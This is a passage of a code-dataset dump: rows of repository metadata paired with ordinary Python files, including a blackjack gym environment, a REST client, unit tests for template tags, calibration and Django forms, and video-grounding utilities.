hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bd4f544d8896cf4cc8569ba0288541ed6799028b
| 6,058 |
py
|
Python
|
gameRL/game_simulators/blackjack.py
|
dwraft/gameRL
|
518b2a2d193220f7334584ccde5cf2ab318d718a
|
[
"MIT"
] | null | null | null |
gameRL/game_simulators/blackjack.py
|
dwraft/gameRL
|
518b2a2d193220f7334584ccde5cf2ab318d718a
|
[
"MIT"
] | null | null | null |
gameRL/game_simulators/blackjack.py
|
dwraft/gameRL
|
518b2a2d193220f7334584ccde5cf2ab318d718a
|
[
"MIT"
] | null | null | null |
"""
Modeled largely after
https://github.com/openai/gym/blob/master/gym/envs/toy_text/blackjack.py
Also, the github version draws with replacement, while I modified to not use replacement
Also, reference here for how to play blackjack
"""
from typing import Dict, List, Tuple
import gym
import numpy as np
from gym import spaces
from gym.utils import seeding
SUITS = 4
CARD_VALUES = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]
DEALER_MAX = 17
class BlackjackDeck:
def __init__(self, N_decks: int, with_replacement=False):
self.N_decks = N_decks
self.deck = CARD_VALUES.copy() * SUITS * N_decks
self.with_replacement = with_replacement
def draw_card(self) -> int:
"""Draws and returns card from the deck"""
index = np.random.randint(len(self.deck))
if self.with_replacement:
return self.deck[index]
return self.deck.pop(index)
def is_empty(self) -> bool:
return not len(self.deck)
class BlackjackHand:
def __init__(self, blackjack_deck: BlackjackDeck, max_hand_sum: int = None):
self.max_hand_sum = max_hand_sum
self.blackjack_deck: BlackjackDeck = blackjack_deck
self.hand: List[int] = []
self._initial_draw()
def draw_card(self):
self.hand.append(self.blackjack_deck.draw_card())
def _initial_draw(self):
self.hand = []
for _ in range(2):
self.draw_card()
def has_usable_ace(self) -> bool:
return 1 in self.hand and sum(self.hand) + 10 <= self.max_hand_sum
def sum_hand(self) -> int:
if self.has_usable_ace():
return sum(self.hand) + 10
return sum(self.hand)
def is_bust(self) -> bool:
return sum(self.hand) > self.max_hand_sum
def score(self) -> int:
return 0 if self.is_bust() else self.sum_hand()
def is_natural(self) -> bool:
"""The optimal blackjack hand, eq"""
return sorted(self.hand) == [1, 10]
def __str__(self) -> str:
return f"Hand={self.hand} Score={self.score()}"
def __repr__(self) -> str:
return f"Hand={self.hand} Score={self.score()}"
@property
def hand_size(self) -> int:
return len(self.hand)
def is_double_down_legal(self) -> bool:
return self.hand_size == 2
class BlackjackCustomEnv(gym.Env):
def __init__(self, N_decks: int, natural_bonus: bool = True, max_hand_sum: int = 21,
simple_game: bool = False):
# actions: either "hit" (keep playing) or "stand" (stop where you are)
self.max_hand_sum = max_hand_sum
self._simple_game = simple_game
self.action_space = spaces.Discrete(2 if simple_game else 3)
self.observation_space = spaces.MultiDiscrete([32, 11, 2])
self.N_decks = N_decks
self.seed()
# Flag to payout 1.5 on a "natural" blackjack win, like casino rules
# Ref: http://www.bicyclecards.com/how-to-play/blackjack/
self.natural_bonus = natural_bonus
# start the first game
self.reset()
def render(self) -> None:
print(f"Dealer State: {str(self.dealer)}\n Player State: {str(self.player)}")
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def _calculate_player_reward(self) -> int:
"""
Computes the player's reward in the case that neither busts
-1 for dealer > player, 0 for tie, 1 for player > dealer
"""
player_sum = self.player.score()
dealer_sum = self.dealer.score()
return (player_sum > dealer_sum) - (dealer_sum > player_sum)
def _hit(self) -> Tuple[bool, int]:
"""Handles case where the player chooses to hit"""
self.player.draw_card()
if self.player.is_bust():
done = True
reward = -1
else:
done = False
reward = 0
return done, reward
def _stick(self) -> Tuple[bool, int]:
"""Handles case where the player chooses to stick"""
done = True
while self.dealer.sum_hand() < DEALER_MAX:
self.dealer.draw_card()
reward = self._calculate_player_reward()
if self.natural_bonus and self.player.is_natural() and reward == 1:
reward = 1.5
return done, reward
def _double_down(self):
"""
Handles case where the player chooses to double down
If the double down is illegal, act as if the player tried to hit.
"""
# it is illegal to double down if you do not have a 9, 10
multiplier = 2
if not self.player.is_double_down_legal():
return self._hit()
done, reward = self._hit()
# case where you went over
if done:
return done, multiplier * reward
_, reward = self._stick()
return True, multiplier * reward
def _get_info(self) -> Dict:
"""Return debugging info, for now just empty dictionary"""
return {}
def step(self, action) -> Tuple[Tuple, int, bool, dict]:
"""Action must be in the set {0,1}"""
assert self.action_space.contains(action)
# player hits
if action == 1:
done, reward = self._hit()
elif action == 0:
done, reward = self._stick()
elif action == 2 and not self._simple_game: # double down
done, reward = self._double_down()
else:
raise ValueError("Illegal action")
return self._get_obs(), reward, done, {}
def _get_obs(self) -> Tuple[int, int, bool]:
return (
self.player.sum_hand(),
self.dealer.hand[0],
self.player.has_usable_ace(),
)
def reset(self) -> Tuple[int, int, bool]:
self.blackjack_deck: BlackjackDeck = BlackjackDeck(self.N_decks)
self.dealer = BlackjackHand(self.blackjack_deck, self.max_hand_sum)
self.player = BlackjackHand(self.blackjack_deck, self.max_hand_sum)
return self._get_obs()
| 31.884211 | 88 | 0.610432 | 5,603 | 0.924893 | 0 | 0 | 71 | 0.01172 | 0 | 0 | 1,306 | 0.215583 |
bd503a6e6bd6d6f165fffc6aa8ef728aa475b171
| 228 |
py
|
Python
|
dragn/dice/__init__.py
|
hugovk/dragn
|
8e6e3146c3a5980a384f4be5dc7019c10ab0bffe
|
[
"MIT"
] | null | null | null |
dragn/dice/__init__.py
|
hugovk/dragn
|
8e6e3146c3a5980a384f4be5dc7019c10ab0bffe
|
[
"MIT"
] | null | null | null |
dragn/dice/__init__.py
|
hugovk/dragn
|
8e6e3146c3a5980a384f4be5dc7019c10ab0bffe
|
[
"MIT"
] | null | null | null |
from functools import partial
from dragn.dice.die_and_roller import roller
D4 = partial(roller, 4)
D6 = partial(roller, 6)
D8 = partial(roller, 8)
D10 = partial(roller, 10)
D12 = partial(roller, 12)
D20 = partial(roller, 20)
| 19 | 44 | 0.732456 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
bd50555970de3cea2bfe20e4fa5b5203c2dc67c1
| 472 |
py
|
Python
|
setup.py
|
steinnes/apnscli
|
3573fb835fe71dcec1c1611eed8c5b73347f0157
|
[
"MIT"
] | 2 |
2015-08-13T18:29:45.000Z
|
2021-08-12T03:31:58.000Z
|
setup.py
|
steinnes/apnscli
|
3573fb835fe71dcec1c1611eed8c5b73347f0157
|
[
"MIT"
] | null | null | null |
setup.py
|
steinnes/apnscli
|
3573fb835fe71dcec1c1611eed8c5b73347f0157
|
[
"MIT"
] | null | null | null |
from setuptools import setup
from pip.req import parse_requirements
from pip.download import PipSession
setup(
name='apnsend',
version='0.1',
description='apnsend is a tool to test your APNS certificate, key and token.',
py_modules=['apnsend'],
install_requires=[
str(req.req) for req in parse_requirements("requirements.txt", session=PipSession())
],
entry_points='''
[console_scripts]
apnsend=apnsend:main
''',
)
| 26.222222 | 92 | 0.680085 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 172 | 0.364407 |
bd5085ad69142965ca0cc325bce4a8b98430c865
| 7,159 |
py
|
Python
|
down2earth/core/client.py
|
intenvy/down-to-earth
|
3d15366a47fe81ee895ba38c7f90a714b18a6c08
|
[
"MIT"
] | null | null | null |
down2earth/core/client.py
|
intenvy/down-to-earth
|
3d15366a47fe81ee895ba38c7f90a714b18a6c08
|
[
"MIT"
] | null | null | null |
down2earth/core/client.py
|
intenvy/down-to-earth
|
3d15366a47fe81ee895ba38c7f90a714b18a6c08
|
[
"MIT"
] | null | null | null |
import json
from abc import ABC, abstractmethod
from typing import Optional
from aiohttp import ClientResponse as Response
from .mechanisms.fetch import IFetchMechanism
from .models.request import IRestRequest
from ..errors.fetching_errors import FetchMechanismFailed
from ..utils.logging_utils import IMonitorLogger, LogLevel
from ..utils.typing_utils import StringMapping, Json, JsonDictionary
def clean_request_params(params: JsonDictionary) -> StringMapping:
clean_params = {}
for key, value in params.items():
if value is not None:
clean_params[key] = str(value)
return clean_params
async def deserialize_response(response: Response) -> Optional[Json]:
content = await response.text()
if len(content) > 0:
try:
return json.loads(content)
except json.JSONDecodeError:
return dict(raw=content)
class IRestClient(ABC):
@property
@abstractmethod
def fetch_mechanism(self) -> IFetchMechanism:
pass
@abstractmethod
async def close(self) -> None:
pass
def _sign_payload(self, request: IRestRequest) -> None:
pass
def _on_response_received(self, request: IRestRequest, response: Response) -> None:
pass
def _on_mechanism_failure(self, request: IRestRequest) -> None:
pass
async def rest_call(self, request: IRestRequest, signed: bool = False) -> Response:
print('Making rest call')
mechanism = self.fetch_mechanism
if signed:
self._sign_payload(request)
try:
print('fetching response')
response = await mechanism.fetch(request)
self._on_response_received(request, response)
return response
except FetchMechanismFailed as e:
print('Error occurred')
print('error:', e.as_dict())
self._on_mechanism_failure(request)
class RestClient(IRestClient):
__slots__ = '_fetch_mechanism', '_logger'
def __init__(self, mechanism: IFetchMechanism, logger: IMonitorLogger):
self._fetch_mechanism: IFetchMechanism = mechanism
self._logger: IMonitorLogger = logger
@property
def fetch_mechanism(self) -> IFetchMechanism:
return self._fetch_mechanism
async def close(self) -> None:
await self._fetch_mechanism.close()
def _on_mechanism_failure(self, request: IRestRequest) -> None:
self._logger.log(LogLevel.ERROR, f'Fetch mechanism failed on {request.url}, Request:{request}')
def _on_response_received(self, request: IRestRequest, response: Response) -> None:
self._logger.log(LogLevel.ERROR, f'Response received from {request.url}, STATUS:{response.status}')
"""
class IRestClient(ABC):
def __init__(self, api_trace_log: bool = False, ssl_context: ssl.SSLContext = None) -> None:
self.api_trace_log = api_trace_log
self.rest_session = None
self.subscription_sets = []
if ssl_context is not None:
self.ssl_context = ssl_context
else:
self.ssl_context = ssl.create_default_context()
@abstractmethod
def _get_rest_api_uri(self, resource: str) -> str:
pass
@abstractmethod
def _sign_payload(self,
rest_call_type: RestCallType,
resource: str,
data: Optional[dict] = None,
params: Optional[dict] = None,
headers: Optional[dict] = None) -> None:
pass
@abstractmethod
def _on_response_received(self,
status_code: int,
headers: CIMultiDictProxy[str],
body: Optional[dict] = None) -> None:
pass
def rest_session(self) -> aiohttp.ClientSession:
pass
async def close(self) -> None:
session = self.rest_session()
if session is not None:
await session.close()
async def _fetch(self,
rest_call_type: RestCallType,
resource: str,
data: Optional[dict] = None,
params: Optional[dict] = None,
headers: Optional[dict] = None) -> aiohttp.ClientResponse:
call = self.rest_session().request(
rest_call_type.value,
self._get_rest_api_uri(resource),
json=data,
params=params,
headers=headers,
ssl=self.ssl_context
)
async with call as response:
status_code = response.status
if 300 > status_code >= 200:
return response
async def _make_rest_call(self, rest_call_type: RestCallType, resource: str, data: dict = None,
params: dict = None, headers: dict = None, signed: bool = False) -> dict:
# ensure headers is always a valid object
if headers is None:
headers = {}
# add signature into the parameters
if signed:
self._sign_payload(rest_call_type, resource, data, params, headers)
# fetch the response
response = await self._fetch(rest_call_type, resource, data=data, params=params, headers=headers)
status_code = response.status
headers = response.headers
body = await response.text()
if len(body) > 0:
try:
body = json.loads(body)
except json.JSONDecodeError:
body = dict(raw=body)
self._on_response_received(status_code, headers, body)
return dict(status_code=status_code, headers=headers, response=body)
def rest_session(self) -> aiohttp.ClientSession:
if self.rest_session is not None:
return self.rest_session
if self.api_trace_log:
trace_config = aiohttp.TraceConfig()
trace_config.on_request_start.append(CryptoXLibClient._on_request_start)
trace_config.on_request_end.append(CryptoXLibClient._on_request_end)
trace_configs = [trace_config]
else:
trace_configs = None
self.rest_session = aiohttp.ClientSession(trace_configs=trace_configs)
return self.rest_session
@staticmethod
def clean_request_params(params: dict) -> dict:
clean_params = {}
for key, value in params.items():
if value is not None:
clean_params[key] = str(value)
return clean_params
@staticmethod
async def _on_request_start(session, trace_config_ctx, params) -> None:
LOG.debug(f'> Context: {trace_config_ctx}')
LOG.debug(f'> Params: {params}')
@staticmethod
async def _on_request_end(session, trace_config_ctx, params) -> None:
LOG.debug(f'< Context: {trace_config_ctx}')
LOG.debug(f'< Params: {params}')
@staticmethod
def _get_current_timestamp_ms() -> int:
return int(datetime.datetime.now(tz=datetime.timezone.utc).timestamp() * 1000)
@staticmethod
def _get_unix_timestamp_ns() -> int:
return int(time.time_ns() * 10 ** 9)
"""
| 33.297674 | 107 | 0.624808 | 1,840 | 0.257019 | 0 | 0 | 251 | 0.035061 | 949 | 0.13256 | 4,641 | 0.648275 |
bd55c1befc97ceb37b6df37eb99994c9d21b2ba9
| 773 |
py
|
Python
|
python/206.reverse-linked-list.py
|
Wanger-SJTU/leetcode-solutions
|
eb7f2fb142b8a30d987c5ac8002a96ead0aa56f4
|
[
"MIT"
] | 2 |
2019-05-13T17:09:15.000Z
|
2019-09-08T15:32:42.000Z
|
python/206.reverse-linked-list.py
|
Wanger-SJTU/leetcode
|
eb7f2fb142b8a30d987c5ac8002a96ead0aa56f4
|
[
"MIT"
] | null | null | null |
python/206.reverse-linked-list.py
|
Wanger-SJTU/leetcode
|
eb7f2fb142b8a30d987c5ac8002a96ead0aa56f4
|
[
"MIT"
] | null | null | null |
#
# @lc app=leetcode id=206 lang=python3
#
# [206] Reverse Linked List
#
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def reverseList(self, head: ListNode) -> ListNode:
def iterative(head):
pre,cur = None, head
while cur:
nxt = cur.next
cur.next = pre
pre = cur
cur = nxt
return pre
def recursively(head):
if not head or not head.next:
return head
node = recursively(head.next)
head.next.next = head
head.next = None
return node
return iterative(head)
| 23.424242 | 54 | 0.500647 | 563 | 0.728331 | 0 | 0 | 0 | 0 | 0 | 0 | 197 | 0.254851 |
1f9c7aa01ba17d2af64bca27a27081040ab187d0
| 2,521 |
py
|
Python
|
tests/default_tags.py
|
GrAndSE/lighty-template
|
63834fbb2421506205745bb596ff8ac726361f2a
|
[
"BSD-3-Clause"
] | 1 |
2018-05-09T19:56:15.000Z
|
2018-05-09T19:56:15.000Z
|
tests/default_tags.py
|
GrAndSE/lighty-template
|
63834fbb2421506205745bb596ff8ac726361f2a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/default_tags.py
|
GrAndSE/lighty-template
|
63834fbb2421506205745bb596ff8ac726361f2a
|
[
"BSD-3-Clause"
] | null | null | null |
'''Module to test default template tags such as if, for, with, include, etc.
'''
import unittest
from lighty.templates import Template
from lighty.templates.loaders import FSLoader
class DefaultTagsTestCase(unittest.TestCase):
"""Test case for if template tag
"""
def assertResult(self, name, result, value):
assert result == value, 'Error on tag "%s" applying to: %s' % (
name, ' '.join((str(result), 'except', str(value))))
def testSpacelless(self):
'''Test spaceless template tag'''
template = Template()
template.parse('''{% spaceless %}
Some
broken
text
{% endspaceless %}''')
result = template({})
right = 'Some broken text'
assert result == right, 'Spaceless tag error:\n%s' % (
"\n".join(result, 'except', right))
def testSimpleWith(self):
'''Test with template tag'''
template = Template()
template.parse('{% with user.name as name %}{{ name }}{% endwith %}')
result = template({'user': {'name': 'John'}})
self.assertResult('with', result.strip(), 'John')
def testSimpleIf(self):
'''Test if template tag'''
template = Template()
template.parse('{% if a %}Foo{% endif %}')
result = template({'a': 1})
self.assertResult('if', result.strip(), 'Foo')
result = template({'a': 0})
self.assertResult('if', result.strip(), '')
def testSimpleFor(self):
'''Test for template tag'''
template = Template()
template.parse('{% for a in list %}{{ a }} {% endfor %}')
result = template({'list': [1, 2, 3, 4, 5]})
self.assertResult('for', result.strip(), '1 2 3 4 5')
def testSimpleInclude(self):
'''Test include template tag'''
template = Template('{% include "simple.html" %}', name="test.html",
loader=FSLoader(['tests/templates']))
result = template({'name': 'Peter'})
self.assertResult('include', result.strip(), 'Hello, Peter')
def test():
suite = unittest.TestSuite()
suite.addTest(DefaultTagsTestCase('testSpacelless'))
suite.addTest(DefaultTagsTestCase('testSimpleWith'))
suite.addTest(DefaultTagsTestCase('testSimpleIf'))
suite.addTest(DefaultTagsTestCase('testSimpleFor'))
suite.addTest(DefaultTagsTestCase('testSimpleInclude'))
return suite
| 36.536232 | 79 | 0.568029 | 1,987 | 0.788179 | 0 | 0 | 0 | 0 | 0 | 0 | 880 | 0.349068 |
1f9c9104d3d243f4e10cfdbb1fb0326c74424885
| 3,038 |
py
|
Python
|
tests/test_calibration.py
|
SoyGema/NannyML
|
323ff404e0e06c479b01d2a63c1c3af9680d95ab
|
[
"Apache-2.0"
] | null | null | null |
tests/test_calibration.py
|
SoyGema/NannyML
|
323ff404e0e06c479b01d2a63c1c3af9680d95ab
|
[
"Apache-2.0"
] | null | null | null |
tests/test_calibration.py
|
SoyGema/NannyML
|
323ff404e0e06c479b01d2a63c1c3af9680d95ab
|
[
"Apache-2.0"
] | null | null | null |
# Author: Niels Nuyttens <[email protected]>
#
# License: Apache Software License 2.0
"""Unit tests for the calibration module."""
import numpy as np
import pandas as pd
import pytest
from nannyml.calibration import IsotonicCalibrator, _get_bin_index_edges, needs_calibration
from nannyml.exceptions import InvalidArgumentsException
@pytest.mark.parametrize('vector_size,bin_count', [(0, 0), (0, 1), (1, 1), (2, 1), (3, 5)])
def test_get_bin_edges_raises_invalid_arguments_exception_when_given_too_few_samples( # noqa: D103
vector_size, bin_count
):
with pytest.raises(InvalidArgumentsException):
_ = _get_bin_index_edges(vector_size, bin_count)
@pytest.mark.parametrize(
'vector_length,bin_count,edges',
[
(20, 4, [(0, 5), (5, 10), (10, 15), (15, 20)]),
(10, 3, [(0, 3), (3, 6), (6, 10)]),
],
)
def test_get_bin_edges_works_correctly(vector_length, bin_count, edges): # noqa: D103
sut = _get_bin_index_edges(vector_length, bin_count)
assert len(sut) == len(edges)
assert sorted(sut) == sorted(edges)
def test_needs_calibration_returns_false_when_calibration_does_not_always_improves_ece(): # noqa: D103
y_true = pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1])
y_pred_proba = y_true
shuffled_indexes = np.random.permutation(len(y_true))
y_true, y_pred_proba = y_true[shuffled_indexes], y_pred_proba[shuffled_indexes]
sut = needs_calibration(y_true, y_pred_proba, IsotonicCalibrator(), bin_count=2, split_count=3)
assert not sut
def test_needs_calibration_returns_true_when_calibration_always_improves_ece(): # noqa: D103
y_true = pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1])
y_pred_proba = abs(1 - y_true)
shuffled_indexes = np.random.permutation(len(y_true))
y_true, y_pred_proba = y_true[shuffled_indexes], y_pred_proba[shuffled_indexes]
sut = needs_calibration(y_true, y_pred_proba, IsotonicCalibrator())
assert sut
def test_needs_calibration_raises_invalid_args_exception_when_y_true_contains_nan(): # noqa: D103
y_true = pd.Series([0, 0, 0, 0, 0, np.NaN, 1, 1, 1, 1, 1, 1])
y_pred_proba = np.asarray([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1])
with pytest.raises(InvalidArgumentsException, match='target values contain NaN.'):
_ = needs_calibration(y_true, y_pred_proba, IsotonicCalibrator())
def test_needs_calibration_raises_invalid_args_exception_when_y_pred_proba_contains_nan(): # noqa: D103
y_true = pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1])
y_pred_proba = pd.Series(np.asarray([0, 0, 0, np.NaN, 0, 0, 1, 1, 1, 1, 1, 1]))
with pytest.raises(InvalidArgumentsException, match='predicted probabilities contain NaN.'):
_ = needs_calibration(y_true, y_pred_proba, IsotonicCalibrator())
def test_needs_calibration_returns_false_when_roc_auc_score_equals_one(): # noqa: D103
y_true = pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1])
y_pred_proba = y_true
sut = needs_calibration(y_true, y_pred_proba, IsotonicCalibrator())
assert sut is False
| 41.616438 | 104 | 0.71264 | 0 | 0 | 0 | 0 | 725 | 0.238644 | 0 | 0 | 336 | 0.110599 |
1f9d448358740aaa0c055882926c57c97ff59db8
| 3,962 |
py
|
Python
|
code/utils.py
|
liudaizong/IA-Net
|
f19295d13d1468eb582521131cde3de83dfd18f6
|
[
"MIT"
] | 4 |
2021-11-02T10:57:12.000Z
|
2022-02-13T17:53:03.000Z
|
code/utils.py
|
liudaizong/IA-Net
|
f19295d13d1468eb582521131cde3de83dfd18f6
|
[
"MIT"
] | null | null | null |
code/utils.py
|
liudaizong/IA-Net
|
f19295d13d1468eb582521131cde3de83dfd18f6
|
[
"MIT"
] | null | null | null |
import copy
import nltk
import json
from gensim.models import KeyedVectors
import h5py
import numpy as np
from torch import nn
def clones(module, N):
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
def load_feature(filename, dataset='ActivityNet'):
if dataset == 'ActivityNet':
with h5py.File(filename, 'r') as fr:
return np.asarray(fr['feature']).astype(np.float32)
elif dataset == 'TACOS':
return np.load(filename).astype(np.float32)
elif dataset == 'Charades':
return np.load(filename).astype(np.float32)
elif dataset == 'Didemo':
with h5py.File(filename, 'r') as fr:
return np.asarray(fr['feature']).astype(np.float32)
return None
def load_json(filename):
with open(filename, encoding='utf8') as fr:
return json.load(fr)
def load_word2vec(filename, binary=True):
word2vec = KeyedVectors.load_word2vec_format(filename, binary=binary)
return word2vec
def tokenize(sentence, word2vec):
punctuations = ['.', '?', ',', '', '(', ')']
raw_text = sentence.lower()
words = nltk.word_tokenize(raw_text)
words = [word for word in words if word not in punctuations]
return [word for word in words if word in word2vec]
def generate_anchors(dataset='ActivityNet'):
if dataset == 'ActivityNet':
widths = np.array([16, 32, 64, 96, 128, 160, 192])
center = 7.5
start = center - 0.5 * (widths - 1)
end = center + 0.5 * (widths - 1)
elif dataset == 'TACOS':
widths = np.array([8, 16, 32, 64])#np.array([6, 18, 32])
center = 7.5
start = center - 0.125 * (widths - 1)
end = center + 0.125 * (widths - 1)
elif dataset == 'Didemo':
widths = np.array([8, 16, 32, 64])#np.array([6, 18, 32])
center = 7.5
start = center - 0.125 * (widths - 1)
end = center + 0.125 * (widths - 1)
elif dataset == 'Charades':
widths = np.array([16, 24, 32, 40])#np.array([6, 18, 32])
center = 7.5
start = center - 0.125 * (widths - 1)
end = center + 0.125 * (widths - 1)
else:
return None
return np.stack([start, end], -1)
import time
class CountMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = np.zeros([2, 4],dtype=np.float32)
self.count = 0
def update(self, val, n=1):
self.val += val
self.count += n
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class TimeMeter(object):
"""Computes the average occurrence of some event per second"""
def __init__(self, init=0):
self.reset(init)
def reset(self, init=0):
self.init = init
self.start = time.time()
self.n = 0
def update(self, val=1):
self.n += val
@property
def avg(self):
return self.n / self.elapsed_time
@property
def elapsed_time(self):
return self.init + (time.time() - self.start)
class StopwatchMeter(object):
"""Computes the sum/avg duration of some event in seconds"""
def __init__(self):
self.reset()
def start(self):
self.start_time = time.time()
def stop(self, n=1):
if self.start_time is not None:
delta = time.time() - self.start_time
self.sum += delta
self.n += n
self.start_time = None
def reset(self):
self.sum = 0
self.n = 0
self.start_time = None
@property
def avg(self):
return self.sum / self.n
| 25.397436 | 73 | 0.579253 | 1,746 | 0.440687 | 0 | 0 | 222 | 0.056032 | 0 | 0 | 447 | 0.112822 |
1f9e4501c0a3ac77cc15f6de9e5e460d7fd997df
| 2,654 |
py
|
Python
|
aps_purchasing/tests/forms_tests.py
|
bitmazk/django-aps-purchasing
|
ff0316f0eaff5bd39ae40aaa861543d125f33dae
|
[
"MIT"
] | 4 |
2015-05-18T13:51:16.000Z
|
2015-05-18T14:47:32.000Z
|
aps_purchasing/tests/forms_tests.py
|
bitmazk/django-aps-purchasing
|
ff0316f0eaff5bd39ae40aaa861543d125f33dae
|
[
"MIT"
] | null | null | null |
aps_purchasing/tests/forms_tests.py
|
bitmazk/django-aps-purchasing
|
ff0316f0eaff5bd39ae40aaa861543d125f33dae
|
[
"MIT"
] | null | null | null |
"""Tests for the forms of the ``aps_purchasing`` app."""
import os
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from django.utils.timezone import now
from ..forms import QuotationUploadForm
from ..models import MPN, Price, Quotation, QuotationItem
from .factories import (
CurrencyFactory,
DistributorFactory,
ManufacturerFactory,
)
class QuotationUploadFormTestCase(TestCase):
"""Tests for the ``QuotationUpoadForm`` form class."""
longMessage = True
def setUp(self):
self.distributor = DistributorFactory()
self.quotation_file = open(os.path.join(
settings.APP_ROOT, 'tests/files/Quotation.csv'))
self.data = {
'distributor': self.distributor.pk,
'ref_number': 'REF123',
'issuance_date': now(),
'expiry_date': now(),
'is_completed': True,
}
self.files = {
'quotation_file': SimpleUploadedFile('Quotation.csv',
self.quotation_file.read()),
}
def test_form(self):
form = QuotationUploadForm(data=self.data)
self.assertFalse(form.is_valid(), msg='The form should not be valid.')
form = QuotationUploadForm(data=self.data, files=self.files)
self.assertFalse(form.is_valid(), msg=(
'Without all the currencies in the DB, the form should not be'
' valid.'))
self.usd = CurrencyFactory(iso_code='USD')
form = QuotationUploadForm(data=self.data, files=self.files)
self.assertFalse(form.is_valid(), msg=(
'Without all the manufacturers in the DB, the form should not be'
' valid.'))
ManufacturerFactory(name='Samsung')
ManufacturerFactory(name='TDK')
form = QuotationUploadForm(data=self.data, files=self.files)
self.assertTrue(form.is_valid(), msg=(
'The form should be valid. Errors: {0}'.format(form.errors)))
form.save()
self.assertEqual(Quotation.objects.count(), 1, msg=(
'After form save, there should be one Quotation in the database.'))
self.assertEqual(QuotationItem.objects.count(), 2, msg=(
'After form save, there should be four QuotationItems in the'
' database.'))
self.assertEqual(Price.objects.count(), 4, msg=(
'Afte form save, there should be three Prices in the database.'))
self.assertEqual(MPN.objects.count(), 2, msg=(
'Afte form save, there should be four new MPNs in the database.'))
| 37.380282 | 79 | 0.629239 | 2,221 | 0.83685 | 0 | 0 | 0 | 0 | 0 | 0 | 742 | 0.279578 |
1f9eb8e2438d5e8851abb15909ddab5b70595c79
| 1,839 |
py
|
Python
|
test/test_read_embark_fields_json_file.py
|
ndlib/mellon-search
|
30f7eb267e35d77ee6d126789866d44d825c3e0c
|
[
"Apache-2.0"
] | null | null | null |
test/test_read_embark_fields_json_file.py
|
ndlib/mellon-search
|
30f7eb267e35d77ee6d126789866d44d825c3e0c
|
[
"Apache-2.0"
] | null | null | null |
test/test_read_embark_fields_json_file.py
|
ndlib/mellon-search
|
30f7eb267e35d77ee6d126789866d44d825c3e0c
|
[
"Apache-2.0"
] | null | null | null |
# test_read_embark_fields_json_file.py 2/18/19 sm
""" test read_embark_fields_json_file.py """
import json
import unittest
# add parent directory to path
import os
import inspect
import sys
CURRENTDIR = os.path.dirname(os.path.abspath(inspect.getfile(
inspect.currentframe())))
PARENTDIR = os.path.dirname(CURRENTDIR)
sys.path.insert(0, PARENTDIR)
from read_embark_fields_json_file import read_embark_fields_json_file
class Test(unittest.TestCase):
""" Class for test fixtures """
def test_read_embark_fields_json_file(self):
""" run all tests in this module """
filename = PARENTDIR + "/EmbArkXMLFields.json"
resulting_json = read_embark_fields_json_file(filename)
with open(filename, 'r') as input_source:
local_json = json.load(input_source)
input_source.close()
self.assertTrue(local_json == resulting_json)
def test_missing_embark_field_definitions_file(self):
""" test for missing field definitions file """
self.assertRaises(FileNotFoundError, read_embark_fields_json_file,
"./EmbArkXMLFields.jsonx")
def test_invalid_embark_field_definitions_file(self):
""" test for missing field definitions file """
self.assertRaises(json.decoder.JSONDecodeError,
read_embark_fields_json_file,
"./InvalidEmbArkXMLFields.json")
def test_embark_field_definitions_file_missing_field(self):
""" test for missing field definitions file """
self.assertRaises(ValueError, read_embark_fields_json_file,
"./EmbArkXMLFieldsMissingField.json")
def suite():
""" define test suite """
return unittest.TestLoader().loadTestsFromTestCase(Test)
if __name__ == '__main__':
suite()
unittest.main()
| 32.839286 | 74 | 0.694943 | 1,244 | 0.676455 | 0 | 0 | 0 | 0 | 0 | 0 | 484 | 0.263187 |
1fa0d3c9b6fdeba10b20b2a6b065d708f3d43858
| 8,928 |
py
|
Python
|
menu/show_results.py
|
